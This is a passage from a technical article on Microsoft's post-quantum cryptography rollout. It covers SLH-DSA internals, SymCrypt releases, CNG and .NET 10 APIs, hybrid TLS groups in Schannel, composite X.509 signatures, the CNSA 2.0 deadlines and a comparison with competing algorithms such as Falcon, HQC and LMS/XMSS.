&lt;p&gt;The construction is a hypertree -- a tree of XMSS subtrees, with WOTS+ (Winternitz One-Time Signature Plus) leaves at each subtree level, and FORS (Forest of Random Subsets) few-time signatures at the bottom layer signing the actual message. The hypertree is sampled fresh per signature via a pseudorandom function of the message, which is what makes SPHINCS+ -&amp;gt; SLH-DSA stateless. Unlike LMS or XMSS, which require the signer to track a counter (because re-using a one-time key reveals the secret), SLH-DSA derives the leaf address from the message hash and a per-signature randomness; no signer state survives between signatures.&lt;/p&gt;

A one-time signature scheme. The signer publishes a public key consisting of hash-chain endpoints; the private key is the chain starts. Signing reveals intermediate chain values that depend on the message digest. A WOTS+ key signs exactly one message; signing a second message with the same key reveals enough chain values to forge any signature. WOTS+ is the leaf primitive of XMSS and SLH-DSA [@fips-205-pdf].

A few-time signature scheme built from $k$ independent hash trees of depth $t$. To sign a message, the signer hashes the message to obtain $k$ leaf indices and reveals the leaf preimage plus authentication path in each tree. Signing many messages with the same FORS key eventually reveals enough leaves to forge, but the few-times threshold is high enough to be tolerable when FORS is the bottom layer of an SLH-DSA hypertree whose root is signed by the layer above [@fips-205-pdf].

flowchart TD
    Root[&quot;SLH-DSA public key = root of top XMSS tree (32-64 bytes)&quot;]
    Root --&amp;gt; T1[&quot;Top XMSS subtree (WOTS+ leaves)&quot;]
    T1 --&amp;gt; T2[&quot;Middle XMSS subtrees (WOTS+ leaves)&quot;]
    T2 --&amp;gt; T3[&quot;More XMSS layers (parameter d controls depth)&quot;]
    T3 --&amp;gt; Bot[&quot;Bottom XMSS subtree&quot;]
    Bot --&amp;gt; FORS[&quot;FORS forest (k trees of depth t)&quot;]
    FORS --&amp;gt; Msg[&quot;Message digest derived from per-signature randomness&quot;]
&lt;p&gt;Twelve parameter sets ship in FIPS 205: every combination of &lt;code&gt;{SHA2, SHAKE}&lt;/code&gt; × &lt;code&gt;{128s, 128f, 192s, 192f, 256s, 256f}&lt;/code&gt; where &lt;code&gt;s&lt;/code&gt; is &quot;small signature, slow signing&quot; and &lt;code&gt;f&lt;/code&gt; is &quot;fast signing, larger signature&quot; [@fips-205-pdf]. Public keys are 32-64 bytes; signatures range from 7,856 bytes (SLH-DSA-SHA2-128s) to 49,856 bytes (SLH-DSA-SHA2-256f). Signing time ranges from ~10 ms (SLH-DSA-SHA2-128f) to several hundred milliseconds at the high end. The use case is &lt;em&gt;code signing&lt;/em&gt;: sign once, verify a billion times. CNG plans &lt;code&gt;BCRYPT_SLHDSA_ALGORITHM&lt;/code&gt; with the same &lt;code&gt;BCRYPT_PQDSA_KEY_BLOB&lt;/code&gt; and &lt;code&gt;BCRYPT_PQDSA_PADDING_INFO&lt;/code&gt; plumbing as ML-DSA [@cng-algorithm-ids].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ML-KEM is the only NIST-finalised KEM. ML-DSA is the general-purpose lattice signature. SLH-DSA is the conservative hash-based fallback. They are not interchangeable; an engineer picks one (or all three) per use case. Hybrid TLS key agreement uses ML-KEM-768; X.509 end-entity signatures use ML-DSA-65 or ML-DSA-87; long-lived code signing where signature size is tolerable uses SLH-DSA; firmware signing with build-counter discipline uses LMS or XMSS.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;All three algorithms are FIPS-standardised. All three have CNG identifiers in Insider Canary builds. But until SymCrypt ships them, until Schannel negotiates them, until AD CS issues certificates that carry them, none of this exists for the Windows engineer in production. So what does Microsoft actually ship in May 2026?&lt;/p&gt;
&lt;h2&gt;6. State of the Art -- What Windows Ships in May 2026&lt;/h2&gt;
&lt;p&gt;Algorithms are not products. Microsoft ships SymCrypt, CNG, NCrypt, Schannel, .NET, AD CS, CertEnroll, and &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; -- and post-quantum cryptography arrives in each surface on its own clock.&lt;/p&gt;
&lt;h3&gt;SymCrypt -- the FIPS-validated foundation&lt;/h3&gt;
&lt;p&gt;SymCrypt is Microsoft&apos;s primary cryptographic library. The repository description states it directly: &quot;SymCrypt is the core cryptographic function library currently used by Windows ... started in late 2006 with the first sources committed in Feb 2007 ... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows&quot; [@symcrypt-repo]. Microsoft open-sourced SymCrypt in March 2019 [@symcrypt-repo]. It is the FIPS 140-validated module that backs CNG; if CNG ships a post-quantum algorithm on Windows, SymCrypt is the implementation underneath.&lt;/p&gt;

Microsoft&apos;s open-source cryptographic library, used by Windows, Azure Linux, Xbox, and other Microsoft platforms. SymCrypt has been Windows&apos;s primary cryptographic library since Windows 10 1703 (April 2017); its FIPS 140-validated module is the implementation backing CNG (the Win32 API surface) and the NCrypt KSP infrastructure (the key-storage-provider surface). SymCrypt is currently written predominantly in cross-platform C, with an in-progress Rust rewrite for memory-safety reasons [@symcrypt-repo, @ms-research-symcrypt-rust].
&lt;p&gt;The SymCrypt release history through May 2026 is verbatim from the public CHANGELOG [@symcrypt-changelog].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Version&lt;/th&gt;
&lt;th&gt;Post-quantum change&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;103.5.0&lt;/td&gt;
&lt;td&gt;Add ML-KEM per final FIPS 203; add XMSS / XMSS^MT&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.6.0&lt;/td&gt;
&lt;td&gt;Add LMS implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.7.0&lt;/td&gt;
&lt;td&gt;Add ML-DSA implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.8.0&lt;/td&gt;
&lt;td&gt;Add FIPS approved-services indicator&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.9.0&lt;/td&gt;
&lt;td&gt;Add ML-DSA Sign / Verify with External Mu&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.9.1&lt;/td&gt;
&lt;td&gt;Add FIPS CAST for ML-DSA, plus ML-KEM and ML-DSA keygen pairwise-consistency tests&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;103.11.0&lt;/td&gt;
&lt;td&gt;Add Composite ML-KEM implementation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The SymCrypt releases page lists the binary artefacts at each version for Windows AMD64/ARM64, generic Linux AMD64/ARM64, and OpenEnclave AMD64 [@symcrypt-releases]. Microsoft has also begun rewriting SymCrypt in Rust; the Microsoft Research blog post describes the rationale (memory safety in a TCB-grade library) and confirms the algorithm coverage includes &quot;AES-GCM, SHA, ECDSA, and the more recent post-quantum algorithms ML-KEM and ML-DSA&quot; [@ms-research-symcrypt-rust].&lt;/p&gt;
&lt;h3&gt;CNG, NCrypt, and .NET 10&lt;/h3&gt;
&lt;p&gt;The Windows Insider Canary channel introduced post-quantum CNG identifiers in May 2025 [@ms-pqc-windows-insider]. The new pseudo-handle &lt;code&gt;BCRYPT_MLKEM_ALG_HANDLE&lt;/code&gt;, the algorithm-name strings &lt;code&gt;BCRYPT_MLKEM_ALGORITHM = L&quot;ML-KEM&quot;&lt;/code&gt; and &lt;code&gt;BCRYPT_MLDSA_ALGORITHM = L&quot;ML-DSA&quot;&lt;/code&gt;, the prerelease &lt;code&gt;BCRYPT_SLHDSA_ALGORITHM&lt;/code&gt;, and the existing &lt;code&gt;BCRYPT_LMS_ALGORITHM&lt;/code&gt; are documented on the CNG Algorithm Identifiers page [@cng-algorithm-ids]. NCrypt KSPs expose the same algorithm names; an application that previously called &lt;code&gt;NCryptCreatePersistedKey&lt;/code&gt; against an RSA KSP can do the equivalent against an ML-KEM KSP with no plumbing changes beyond the algorithm identifier and parameter set.&lt;/p&gt;
&lt;p&gt;.NET 10 (GA November 2025) exposes the managed surface [@dotnet-10-launch]. &lt;code&gt;System.Security.Cryptography.MLKem&lt;/code&gt; is an abstract base class with &lt;code&gt;KeyGen&lt;/code&gt;, &lt;code&gt;Encapsulate&lt;/code&gt;, &lt;code&gt;Decapsulate&lt;/code&gt;, &lt;code&gt;ExportEncapsulationKey&lt;/code&gt;, and &lt;code&gt;ImportEncapsulationKey&lt;/code&gt; instance methods [@dotnet-mlkem]. &lt;code&gt;MLKemCng&lt;/code&gt; is the CNG-backed concrete subclass that forwards to SymCrypt via CNG [@dotnet-mlkemcng]. Equivalent &lt;code&gt;MLDsa&lt;/code&gt; / &lt;code&gt;MLDsaCng&lt;/code&gt; and &lt;code&gt;SlhDsa&lt;/code&gt; / &lt;code&gt;SlhDsaCng&lt;/code&gt; pairs cover the signature primitives. The &lt;code&gt;*Cng&lt;/code&gt; subclasses are sealed; the abstract base classes are subclassable for non-CNG implementations.&lt;/p&gt;
&lt;h3&gt;Schannel hybrid TLS 1.3&lt;/h3&gt;
&lt;p&gt;Schannel is the Windows TLS stack. The hybrid TLS 1.3 Supported Groups are defined by IETF &lt;code&gt;draft-ietf-tls-ecdhe-mlkem-04&lt;/code&gt; (8 February 2026) [@draft-tls-ecdhe-mlkem]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Group&lt;/th&gt;
&lt;th&gt;Codepoint&lt;/th&gt;
&lt;th&gt;Construction&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;X25519MLKEM768&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x11EC&lt;/td&gt;
&lt;td&gt;RFC 7748 X25519 plus ML-KEM-768&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SecP256r1MLKEM768&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x11EB&lt;/td&gt;
&lt;td&gt;NIST P-256 plus ML-KEM-768&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SecP384r1MLKEM1024&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0x11ED&lt;/td&gt;
&lt;td&gt;NIST P-384 plus ML-KEM-1024&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The IANA TLS Parameters registry lists all three (registry last updated 2026-04-29) [@iana-tls-parameters]. Schannel preview on 24H2 and Server 2025 gates these behind Group Policy in early 2026; default-on is the May 2026 -&amp;gt; November 2026 milestone per Microsoft&apos;s Quantum-Safe Security blog [@ms-quantum-safe-blog]. The actual TLS key schedule combines the two shared secrets with a concatenation combiner: $\text{HKDF-Extract}(\text{salt} = 0, \text{IKM} = K_{\text{ecdh}} | K_{\text{pq}})$, per &lt;code&gt;draft-ietf-tls-hybrid-design-16&lt;/code&gt; [@draft-tls-hybrid]. The combiner is correct as long as either component is unbroken; an adversary breaking only ECDH cannot recover the session key, nor can one who breaks only ML-KEM.&lt;/p&gt;
&lt;h3&gt;AD CS, CertEnroll, and Azure Key Vault&lt;/h3&gt;
&lt;p&gt;The X.509 side of the migration lags TLS by a year. Active Directory Certificate Services supports ML-DSA certificate templates via the CertEnroll API, conditional on a CSP or KSP exposing &lt;code&gt;BCRYPT_MLDSA_ALGORITHM&lt;/code&gt;. The practical migration mechanism is &lt;em&gt;composite&lt;/em&gt; signatures per &lt;code&gt;draft-ietf-lamps-pq-composite-sigs-19&lt;/code&gt; (21 April 2026), which combines ML-DSA with RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, or Ed448 in a single &lt;code&gt;SubjectPublicKeyInfo&lt;/code&gt; and requires both components to verify [@draft-lamps-composite]. Downlevel verifiers that do not recognise the composite OID can still validate the inner classical chain; uplevel verifiers validate both. Pure post-quantum X.509 chains are in preview for closed pilots, not in general use. Azure Key Vault&apos;s managed-HSM exposes post-quantum keys in preview for Q1 2026.&lt;/p&gt;

flowchart TD
    ISV[&quot;ISV applications (browsers, services, SDKs)&quot;]
    Schannel[&quot;Schannel (TLS 1.3 with X25519MLKEM768)&quot;]
    ADCS[&quot;AD CS / CertEnroll (ML-DSA, composite signatures)&quot;]
    DotNet[&quot;.NET 10 (MLKem, MLDsa, SlhDsa managed types)&quot;]
    KSP[&quot;NCrypt KSPs (Microsoft Software KSP, Pluton KSP, vendor KSPs)&quot;]
    CNG[&quot;CNG Win32 API (BCryptEncapsulate, BCryptSignHash, ...)&quot;]
    SymCrypt[&quot;SymCrypt (FIPS-validated, primary crypto library since Win10 1703)&quot;]
    HW[&quot;Hardware (CPU AES-NI, Pluton, TPM 2.0, IOMMU)&quot;]
    ISV --&amp;gt; Schannel
    ISV --&amp;gt; ADCS
    ISV --&amp;gt; DotNet
    Schannel --&amp;gt; CNG
    ADCS --&amp;gt; CNG
    DotNet --&amp;gt; CNG
    Schannel --&amp;gt; KSP
    KSP --&amp;gt; CNG
    CNG --&amp;gt; SymCrypt
    SymCrypt --&amp;gt; HW
&lt;h3&gt;What is NOT shipping in May 2026&lt;/h3&gt;
&lt;p&gt;The honest accounting matters. Several load-bearing Windows surfaces have no post-quantum path as of May 2026.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The post-quantum migration is partial. As of May 2026, none of the following has a published Microsoft post-quantum specification or shipping implementation: IKEv2 PQ key exchange; SMB hybrid (&lt;code&gt;X25519MLKEM768&lt;/code&gt; over SMB 3.1.1); RDP hybrid; BitLocker network unlock (still RSA-2048 + AES-256); Kerberos PKINIT (no PQ certificate path for the KDC bootstrap); Windows Hello attestation (TPM-bound RSA-2048 / ECDSA-P256). Authenticode signatures on drivers and binaries remain RSA-2048 + SHA-256 with no published PQ Authenticode specification. Premature migration of these surfaces is &lt;em&gt;worse&lt;/em&gt; than no migration, because there is no downlevel-compatible composite story for them. The discipline is: hybrid TLS first, composite X.509 chain second, firmware signing pilot third. Leave the rest alone until Microsoft publishes specifications [@ms-quantum-safe-blog].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;CNSA 2.0 -- the policy clock&lt;/h3&gt;
&lt;p&gt;CNSA 2.0 turns the technical timeline into an acquisition mandate. The four authoritative dates from the May 30, 2025 revision of the Cybersecurity Advisory [@cnsa20-csa]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Milestone&lt;/th&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Acquisition preference for PQ in new National Security Systems&lt;/td&gt;
&lt;td&gt;January 1, 2027&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Legacy algorithm phase-out begins&lt;/td&gt;
&lt;td&gt;December 31, 2030&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mandatory PQ adoption in National Security Systems&lt;/td&gt;
&lt;td&gt;December 31, 2031&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RSA / ECDSA disallowed in National Security Systems&lt;/td&gt;
&lt;td&gt;After 2035&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The U.S. National Security Agency&apos;s Commercial National Security Algorithm Suite 2.0, announced September 7, 2022 [@nsa-cnsa-news]. CNSA 2.0 mandates post-quantum algorithms for U.S. National Security Systems by 2031 and disallows RSA / ECDSA after 2035. Specific algorithm selections (May 30, 2025 revision): ML-KEM-1024 for key establishment, ML-DSA-87 for general signing, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, SHA-384 for hashing [@cnsa20-csa]. The CNSA 2.0 dates drive every U.S. vendor&apos;s PQC roadmap including Microsoft&apos;s.

A FIPS 140-3 validation is a Cryptographic Module Validation Program certificate that asserts a cryptographic module (a binary, with a specific version, a specific build, and a specific tested configuration) implements specific algorithms correctly and has been tested by an accredited lab. SymCrypt&apos;s FIPS validation is what makes CNG-backed cryptography acceptable for U.S. federal procurement; without validation, the same algorithm implemented in the same byte-exact code is not FIPS-validated. The cadence matters because algorithm-implementation cadence (new ML-DSA External-Mu support in v103.9.0) and module-validation cadence (a new CMVP certificate per validated build) are different clocks. SymCrypt v103.8.0 explicitly added a FIPS approved-services indicator [@symcrypt-changelog] -- the runtime hook by which an application can ask &quot;am I operating in FIPS-validated mode?&quot; and reject non-FIPS algorithms accordingly. CMVP queue times in 2026 are running 9-18 months, which means the published SymCrypt version is typically two or three versions ahead of the FIPS-validated version at any given moment.
&lt;p&gt;ML-KEM is the only NIST-finalised KEM. ML-DSA and SLH-DSA are the only NIST-finalised signature schemes. But the NIST portfolio still has Falcon in FIPS 206 draft, HQC for code-based diversification, LMS / XMSS for firmware -- and the IETF still has composite signatures and hybrid TLS layered on top. What else is shipping, and why?&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches -- Inside the Lattice Lane and Outside It&lt;/h2&gt;
&lt;p&gt;ML-KEM is the only KEM in FIPS 203, but it is not the only KEM in the portfolio. Several other algorithms compete for adjacent niches, and the engineer who treats &quot;PQ&quot; as one thing misses the architectural choices that CNSA 2.0 and NIST actually make.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Falcon (FN-DSA, FIPS 206 draft).&lt;/strong&gt; NTRU-lattice signatures with fast Fourier sampling. Signature sizes range from 666 bytes (Falcon-512, category 1) to 1280 bytes (Falcon-1024, category 5) -- three to five times smaller than ML-DSA-65 at comparable security; the byte counts are verbatim from the Falcon Round-3 specification&apos;s recommended-parameters table [@falcon-spec]. The cost is Falcon&apos;s Gaussian sampler, which requires floating-point arithmetic and is notoriously hard to make constant-time. Microsoft has signalled support; SymCrypt has not shipped Falcon as of May 2026. FIPS 206 finalisation is the precondition; NIST&apos;s &lt;code&gt;pqc-dig-sig&lt;/code&gt; project page lists Falcon (renamed FN-DSA) as the standard whose finalisation has been pushed past initial timelines pending the constant-time sampler question [@nist-pqc-dig-sig].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;HQC (Hamming Quasi-Cyclic).&lt;/strong&gt; NIST selected HQC as the fourth-round standardisation choice on 7 March 2025 [@nist-hqc-news]. HQC is code-based -- its security rests on the hardness of decoding random quasi-cyclic codes -- which is structurally unrelated to lattice cryptography. NIST IR 8545 documents the rationale: HQC offers diversification away from lattices in case future cryptanalysis makes Module-LWE less conservative than it now appears. HQC was chosen over BIKE; Classic McEliece remains a candidate but was not selected because of key size. NIST is expected to publish the HQC standard around 2027.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Classic McEliece.&lt;/strong&gt; ~1 MB public keys at NIST category 5; ~261 KB at category 1 [@mceliece-project]. Forty-eight years of cryptanalysis without a structural break. Not selected by NIST for general standardisation. Survives as a niche choice for long-term archival key wrapping, where the key transfer happens once and the ciphertext is small.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;LMS, XMSS, XMSS^MT (stateful hash-based, NIST SP 800-208).&lt;/strong&gt; Already in SymCrypt. The NIST SP 800-208 specification names &quot;two algorithms ... stateful hash-based signature schemes: the Leighton-Micali Signature (LMS) system and the eXtended Merkle Signature Scheme (XMSS), along with their multi-tree variants (HSS and XMSS_MT)&quot; [@nist-sp-800-208]. CNSA 2.0 specifies LMS and XMSS for firmware signing: UEFI capsule signing, OEM driver signing, secure-boot dbx revocation entries [@cnsa20-csa]. The stateful-counter requirement -- the signer must track a build counter and never reuse a leaf index -- is acceptable in build pipelines that already track build numbers monotonically. SymCrypt v103.5.0 added XMSS and XMSS^MT; v103.6.0 added LMS [@symcrypt-changelog].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; CNSA 2.0 names stateful hash-based signatures for firmware signing and only firmware signing. The reason is operational. LMS and XMSS are state-leaking: signing twice with the same leaf index reveals the secret. A general-purpose signing surface (X.509 end-entity certificates, code signing for arbitrary developers, document signing) cannot guarantee state discipline. A firmware-build pipeline that issues build numbers monotonically and operates under hardware-security-module discipline can. The narrow scope is what makes LMS / XMSS safe to deploy now -- the stateless SLH-DSA story is the general-purpose alternative for everything that cannot guarantee counter discipline [@cnsa20-csa, @nist-sp-800-208].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Composite signatures.&lt;/strong&gt; &lt;code&gt;draft-ietf-lamps-pq-composite-sigs-19&lt;/code&gt; (21 April 2026) defines combinations of ML-DSA with each of RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, and Ed448 [@draft-lamps-composite]. The X.509 SubjectPublicKeyInfo contains both component public keys; verification requires both component signatures to succeed; an attacker must break both algorithms. Composite is the &lt;strong&gt;load-bearing migration mechanism for 2026-2030&lt;/strong&gt;, because it is deployable against today&apos;s PKI. Downlevel verifiers ignore the composite OID and trust the inner classical chain; uplevel verifiers validate both.&lt;/p&gt;

A signature construction that combines two component signature algorithms -- one classical, one post-quantum -- such that both signatures must verify for the composite signature to validate. The composite public key is the concatenation of the two component public keys plus a composite-OID wrapper; the composite signature is the concatenation of the two component signatures. The construction provides &quot;either-component&quot; security: an adversary must break both algorithms to forge. Composite is the practical migration on-ramp for X.509 PKI during 2026-2030 [@draft-lamps-composite].
&lt;p&gt;&lt;strong&gt;Hybrid TLS X25519MLKEM768.&lt;/strong&gt; Already in production at internet scale. Cloudflare since October 2022; Apple iMessage PQ3 since February 2024; Signal PQXDH since September 2023 [@signal-pqxdh]; OpenSSH since version 9.0 (April 2022) via &lt;code&gt;sntrup761x25519-sha512&lt;/code&gt; (Streamlined NTRU Prime + X25519) [@openssh-9-0], with the ML-KEM-768-based group &lt;code&gt;mlkem768x25519-sha256&lt;/code&gt; added in OpenSSH 9.9 (September 2024) [@openssh-9-9]; Google Chrome; Microsoft Edge. Schannel preview on 24H2 and Server 2025 in early 2026 [@cloudflare-pq-for-all, @cloudflare-pq-2024, @apple-imessage-pq3].Apple&apos;s framing of PQ3 as &quot;Level 3&quot; is the policy-marketing achievement of the post-quantum era. Level 1 is no post-quantum; Level 2 is post-quantum key establishment for the &lt;em&gt;initial&lt;/em&gt; handshake; Level 3 is post-quantum key establishment for &lt;em&gt;both&lt;/em&gt; the initial handshake and ongoing message-key ratcheting. iMessage PQ3 reached Level 3 in February 2024 -- six months before ML-KEM was even FIPS-finalised. The companion symbolic-analysis PDF Apple commissioned confirms the parameter split: ML-KEM-1024 for the initial key exchange, Kyber-768 for the ongoing ratchet [@apple-imessage-pq3].&lt;/p&gt;

A key-exchange construction that combines a classical key-agreement algorithm (X25519, ECDH-P256, RSA) with a post-quantum KEM (ML-KEM-768) in such a way that the final shared secret depends on both components. An adversary who breaks either component but not both learns nothing. The most common combiner is HKDF-Extract over the concatenation of the two shared secrets, per `draft-ietf-tls-hybrid-design-16` [@draft-tls-hybrid]. Hybrid is the migration choice during the period when neither classical nor post-quantum primitives can be trusted standalone -- classical because of harvest-now-decrypt-later, post-quantum because of the narrower cryptanalytic margin (see Section 8).
&lt;p&gt;Compact portfolio comparison for the KEM side (HQC sizes are current Round-4 parameters from the HQC project specification [@hqc-project]):&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Public key&lt;/th&gt;
&lt;th&gt;Ciphertext&lt;/th&gt;
&lt;th&gt;Hardness&lt;/th&gt;
&lt;th&gt;NIST status&lt;/th&gt;
&lt;th&gt;Microsoft adoption&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ML-KEM-768&lt;/td&gt;
&lt;td&gt;1184 B&lt;/td&gt;
&lt;td&gt;1088 B&lt;/td&gt;
&lt;td&gt;Module-LWE&lt;/td&gt;
&lt;td&gt;FIPS 203&lt;/td&gt;
&lt;td&gt;SymCrypt 103.5.0; CNG; Schannel hybrid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HQC-1&lt;/td&gt;
&lt;td&gt;2241 B (cat 1)&lt;/td&gt;
&lt;td&gt;4433 B (cat 1)&lt;/td&gt;
&lt;td&gt;Quasi-cyclic codes&lt;/td&gt;
&lt;td&gt;Round-4 selected (March 2025)&lt;/td&gt;
&lt;td&gt;Not yet in SymCrypt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Classic McEliece&lt;/td&gt;
&lt;td&gt;~261 KB to ~1 MB&lt;/td&gt;
&lt;td&gt;~128 B to ~240 B&lt;/td&gt;
&lt;td&gt;Goppa codes&lt;/td&gt;
&lt;td&gt;Round-4 niche&lt;/td&gt;
&lt;td&gt;Not in SymCrypt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid X25519+MLKEM768&lt;/td&gt;
&lt;td&gt;1216 B&lt;/td&gt;
&lt;td&gt;1120 B&lt;/td&gt;
&lt;td&gt;X25519 OR Module-LWE&lt;/td&gt;
&lt;td&gt;TLS 1.3 IETF draft&lt;/td&gt;
&lt;td&gt;Schannel preview, default-on roadmap&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Signature side:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Algorithm&lt;/th&gt;
&lt;th&gt;Public key&lt;/th&gt;
&lt;th&gt;Signature&lt;/th&gt;
&lt;th&gt;Hardness&lt;/th&gt;
&lt;th&gt;NIST status&lt;/th&gt;
&lt;th&gt;Microsoft adoption&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ML-DSA-65&lt;/td&gt;
&lt;td&gt;1952 B&lt;/td&gt;
&lt;td&gt;3293 B&lt;/td&gt;
&lt;td&gt;Module-LWE / Module-SIS&lt;/td&gt;
&lt;td&gt;FIPS 204&lt;/td&gt;
&lt;td&gt;SymCrypt 103.7.0; CNG&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Falcon-512&lt;/td&gt;
&lt;td&gt;897 B&lt;/td&gt;
&lt;td&gt;666 B [@falcon-spec]&lt;/td&gt;
&lt;td&gt;NTRU lattices&lt;/td&gt;
&lt;td&gt;FIPS 206 draft&lt;/td&gt;
&lt;td&gt;Not in SymCrypt&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SLH-DSA-SHA2-128f&lt;/td&gt;
&lt;td&gt;32 B&lt;/td&gt;
&lt;td&gt;17088 B&lt;/td&gt;
&lt;td&gt;SHA-2 collision resistance&lt;/td&gt;
&lt;td&gt;FIPS 205&lt;/td&gt;
&lt;td&gt;Planned &lt;code&gt;BCRYPT_SLHDSA_ALGORITHM&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LMS / HSS&lt;/td&gt;
&lt;td&gt;60 B&lt;/td&gt;
&lt;td&gt;4-50 KB&lt;/td&gt;
&lt;td&gt;Hash preimage&lt;/td&gt;
&lt;td&gt;NIST SP 800-208&lt;/td&gt;
&lt;td&gt;SymCrypt 103.6.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Composite ML-DSA-65 + ECDSA-P256&lt;/td&gt;
&lt;td&gt;~2 KB&lt;/td&gt;
&lt;td&gt;~3.4 KB&lt;/td&gt;
&lt;td&gt;ML-DSA AND ECDSA&lt;/td&gt;
&lt;td&gt;LAMPS draft-19&lt;/td&gt;
&lt;td&gt;AD CS pilot path&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The portfolio works as long as one of its families holds. But what if it doesn&apos;t? What does cryptography &lt;em&gt;not&lt;/em&gt; tell us about the future, and what are the structural limits of even the strongest post-quantum primitive?&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits -- What PQC Does and Does Not Solve&lt;/h2&gt;
&lt;p&gt;Post-quantum cryptography is not magic. It closes one specific channel of one specific threat model, and engineers who treat it as &quot;now we&apos;re quantum-safe&quot; miss the four limits the cryptographers themselves keep flagging.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. The cryptanalysis margin is narrower than for RSA or ECDH.&lt;/strong&gt; The best classical algorithm for solving Module-LWE at NIST parameter sizes (BKZ with sieving) runs in roughly $2^{0.292 n}$ operations, where $n$ is the lattice dimension; the best quantum variant runs in roughly $2^{0.257 n}$. That is a 12% exponent reduction -- not a Shor-style polynomial-time collapse. NIST parameter sizes carry a small but measurable margin to absorb future BKZ-with-sieving improvements. The hardness conjecture is stronger than RSA&apos;s (worst-case-to-average-case reduction), but the cryptanalytic frontier is thinner. Lattice cryptanalysis has improved continuously since Ajtai 1996; whether the asymptotic exponent further drops in the next decade is an open problem [@regev-2005, @langlois-stehle-modulelwe].&lt;/p&gt;
